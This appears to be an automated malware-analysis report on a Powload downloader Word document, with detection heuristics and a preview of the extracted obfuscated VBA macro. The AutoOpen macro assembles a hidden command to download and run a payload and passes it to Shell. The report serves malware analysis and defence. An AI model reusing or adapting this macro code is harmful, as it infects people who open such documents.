MALICIOUS
Risk Score: 182

Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a command using the Shell function, likely to download and run a second-stage payload. The reconstructed command string is 'md /V /C ^'. The specific family is not identifiable from the provided evidence.
Heuristics (6)

- ClamAV: Doc.Downloader.Powload-6695687-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Powload-6695687-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11444 bytes |

SHA-256 (macros.bas): fc6ec72562194e5581ec99991228395536680eb259b9637a846cecd9b3ed87cc
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "fMQZWtf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim FRjPaP(1)
FRjPaP(0) = Mid("cdEdU", 203, 719)
Dim wOqYFm(1)
wOqYFm(0) = MidB("fOLSat", 24, 155)
Dim SQnWul(2)
SQnWul(0) = Right("kblzhNQa", 909)
SQnWul(1) = Mid("tSaCTC", 947, 947)
Dim bEMaiH(2)
bEMaiH(0) = MidB("OSDRnA", 816, 744)
bEMaiH(1) = MidB("mvUKvzjC", 784, 461)
Dim PDMsiO(1)
PDMsiO(0) = MidB("HibduRt", 806, 837)
zFQBulIL (KeyString(4 + 5 + 3 + 11 + 44) + IabWm + ztvNoQfGqMk + OEEiKIsWX + duikU + APYwowb + LEZLDElEfFWD)
Dim JQXUM(2)
JQXUM(0) = MidB("mGqzBB", 327, 149)
JQXUM(1) = MidB("ziSPuHhr", 160, 774)
Dim IlMwM(2)
IlMwM(0) = MidB("rGcKQ", 274, 290)
IlMwM(1) = MidB("zizYKj", 608, 879)
Dim woYiM(2)
woYiM(0) = MidB("ndGBA", 429, 481)
woYiM(1) = MidB("FXwGjnva", 28, 342)
End Sub
Function zFQBulIL(GonhnKz As String)
Dim qjNCN(2)
qjNCN(0) = MidB("EAbYOjw", 873, 187)
qjNCN(1) = Mid("jSnOMSsS", 151, 463)
Dim GKhOmE(1)
GKhOmE(0) = MidB("wfWuGXKX", 291, 422)
Shell@ GonhnKz, CInt(msoBarTypeNormal)
Dim pVhDRw(1)
pVhDRw(0) = Mid("qCHPFYz", 58, 607)
Dim Kcmpwm(2)
Kcmpwm(0) = Mid("tHTkiDNX", 324, 808)
Kcmpwm(1) = Mid("MNKqwikE", 450, 826)
End Function
Attribute VB_Name = "UBRcvIm"
Function IabWm()
Dim nhRLXB(1)
nhRLXB(0) = Left("lEbVrTtB", 738)
bYQFOOsAv = "md" + " " + "/V" + "/C" + ChrW(4 + 3 + 1 + 3 + 23) + "^"
Dim pFlEl(2)
pFlEl(0) = Right("GzzaM", 924)
pFlEl(1) = MidB("VBjaRNnZ", 360, 708)
Dim CuPwRT(2)
CuPwRT(0) = MidB("nJRNhvw", 717, 297)
CuPwRT(1) = Right("mwvucp", 481)
Dim sJomXj(1)
sJomXj(0) = MidB("bVVOWkm", 652, 850)
MQCSdwswz = "s" + "e^t " + "8^J^" + "Z^j=" + " ^ " + "^ "
Dim WlBLcU(2)
WlBLcU(0) = MidB("RnzQFiY", 643, 601)
WlBLcU(1) = Right("MHKmOpF", 395)
Dim wKCbvc(2)
wKCbvc(0) = Right("LCYLqpWU", 314)
wKCbvc(1) = MidB("qHGEXVWd", 803, 838)
Dim pjwFlX(2)
pjwFlX(0) = Right("fnJiNCu", 970)
pjwFlX(1) = Mid("qqAVw", 760, 823)
Dim tztaFq(1)
tztaFq(0) = Left("BdfCEj", 248)
tTYSFUAMlE = " ^ " + " ^ ^" + " " + " ^ ^" + " " + " ^ " + " " + "^ ^" + " ^}^" + "}^" + "{^" + "hct" + "ac}"
Dim BqwbBM(2)
BqwbBM(0) = MidB("YrOmfIK", 261, 257)
BqwbBM(1) = MidB("LSQGtVBf", 598, 907)
Dim LvHvvr(2)
LvHvvr(0) = MidB("tkkoufi", 93, 856)
LvHvvr(1) = Mid("VwwFPnLz", 283, 381)
lzrSEzZ = ";k" + "^" + "a^er" + "^b;h" + "i^" + "b$^ " + "^m" + "et^"
Dim zwVRb(1)
zwVRb(0) = MidB("vhOUqbS", 438, 565)
Dim jXKSiu(2)
jXKSiu(0) = MidB("SiVWUCGM", 373, 938)
jXKSiu(1) = MidB("awCDB", 143, 410)
Dim umqOoL(2)
umqOoL(0) = Left("phztdWD", 936)
umqOoL(1) = MidB("atWIDv", 848, 133)
KZEIsMzjjta = "I-^" + "eko" + "vn^" + "I" + "^;)" + "h" + "^i" + "b^" + "$^ ," + "r" + "^T" + "^" + "S^$"
Dim Ytztj(2)
Ytztj(0) = Left("rMbKaVTH", 367)
Ytztj(1) = Right("NHUklUbB", 250)
Dim GiHbZW(2)
GiHbZW(0) = MidB("MjSFI", 708, 762)
GiHbZW(1) = MidB("tfCDsRt", 28, 848)
auaGowHvdz = "(" + "e" + "^l^" + "i^F^" + "d^" + "a" + "o"
Dim XsVESz(2)
XsVESz(0) = Left("fTmfOhK", 440)
XsVESz(1) = Right("KJcYZ", 75)
Dim PwIUTZ(2)
PwIUTZ(0) = MidB("vIPdJ", 890, 126)
PwIUTZ(1) = Right("hzTRERR", 257)
Dim hMdPw(2)
hMdPw(0) = Mid("zJNpiQ", 332, 459)
hMdPw(1) = Mid("RTJiw", 485, 529)
Dim IKiDV(2)
IKiDV(0) = MidB("fFjjrF", 933, 864)
IKiDV(1) = MidB("PICzirzk", 162, 748)
itwEs = "^ln^" + "w^oD" + "." + "Z" + "jb" + "$^{^" + "y" + "rt" + "^{" + ")V^H" + "^b" + "^"
Dim NkdDPE(1)
NkdDPE(0) = MidB("nkuKSRVj", 342, 216)
Dim oVLZZ(2)
oVLZZ(0) = Left("nnPGYP", 462)
oVLZZ(1) = MidB("ozjzisC", 471, 337)
Dim pVdUwl(2)
pVdUwl(0) = Right("zMlmkipN", 428)
pVdUwl(1) = MidB("qTJiv", 723, 315)
Dim NBKRW(1)
NBKRW(0) = Left("hzGDujMA", 316)
tAMHAl = "$ " + "n^i" + "^ rT" + "^S" + "^$(" + "hc^" + "ae" + "r^" + "o^f;"
Dim IViou(2)
IViou(0) = Mid("SLoZz", 559,
```

... (truncated)